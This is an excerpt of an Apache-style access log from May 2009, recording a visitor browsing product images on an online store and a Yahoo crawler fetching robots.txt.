87.51.48.38 - - [19/May/2009:03:06:45 -0400] "GET /images/items/3231001_THUMB.JPG HTTP/1.1" 200 939 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4621E11900E92D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:06:46 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4621E11900E92D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:06:46 -0400] "GET /images/items/3231003_THUMB.JPG HTTP/1.1" 200 1116 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4621E11900E92D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:06:46 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4621E11900E92D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.30.142.226 - - [19/May/2009:03:06:51 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.226 - - [19/May/2009:03:06:51 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.51.48.38 - - [19/May/2009:03:06:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L10739F42284129008B8D09T+M37+ENG HTTP/1.1" 200 47062 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4621E11900E92D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:06:53 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739F42284129008B8D09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:07:26 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:07:27 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:07:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
